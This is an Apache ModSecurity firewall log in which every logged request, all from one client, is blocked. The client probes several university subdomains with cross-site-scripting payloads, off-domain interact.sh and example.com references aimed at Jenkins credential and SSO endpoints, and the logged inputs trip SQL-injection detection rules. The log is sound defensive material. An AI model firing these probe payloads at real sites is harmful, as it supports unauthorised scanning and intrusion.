[Tue Aug 29 11:51:21.693581 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAm91nAAAAAG"]
[Tue Aug 29 11:51:21.701662 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAjdQUAAAAAZ"]
[Tue Aug 29 11:51:21.701806 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAmHd@gAAAAz"]
[Tue Aug 29 11:51:21.727873 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAmNp4IAAAAQ"]
[Tue Aug 29 11:51:21.815577 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15ScCo-f0AAAm7m@AAAAAE"]
[Tue Aug 29 11:51:22.686330 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAmHd@kAAAAz"]
[Tue Aug 29 11:51:22.728829 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAknEOkAAAAB"]
[Tue Aug 29 11:51:22.731119 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAjdQUEAAAAZ"]
[Tue Aug 29 11:51:22.788889 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAnB5U8AAAAJ"]
[Tue Aug 29 11:51:22.897462 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15SsCo-f0AAAm@5xoAAAAH"]
[Tue Aug 29 11:51:22.919241 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAmHd@oAAAAz"]
[Tue Aug 29 11:51:22.923098 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAknEOoAAAAB"]
[Tue Aug 29 11:51:22.923862 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAnGkIEAAAAR"]
[Tue Aug 29 11:51:22.927897 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAfWOEQAAAAL"]
[Tue Aug 29 11:51:22.960943 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAnHQdsAAAAT"]
[Tue Aug 29 11:51:22.964191 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAnIlgMAAAAV"]
[Tue Aug 29 11:51:22.965138 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAnDFyUAAAAM"]
[Tue Aug 29 11:51:22.965463 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAkyyEsAAAAW"]
[Tue Aug 29 11:51:22.970205 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAmQ-w8AAAAb"]
[Tue Aug 29 11:51:22.972372 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAlIBh4AAAAn"]
[Tue Aug 29 11:51:22.996377 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAmHd@sAAAAz"]
[Tue Aug 29 11:51:23.017296 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAfWOEUAAAAL"]
[Tue Aug 29 11:51:23.087316 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15S8Co-f0AAAm91nMAAAAG"]
[Tue Aug 29 11:51:23.091551 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAhhc1UAAAAd"]
[Tue Aug 29 11:51:23.165148 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAjdQUMAAAAZ"]
[Tue Aug 29 11:51:23.563470 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAnIlgQAAAAV"]
[Tue Aug 29 11:51:23.564164 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAlIBh8AAAAn"]
[Tue Aug 29 11:51:23.565367 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAmIbP8AAAAo"]
[Tue Aug 29 11:51:23.567043 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAkwQXEAAAAS"]
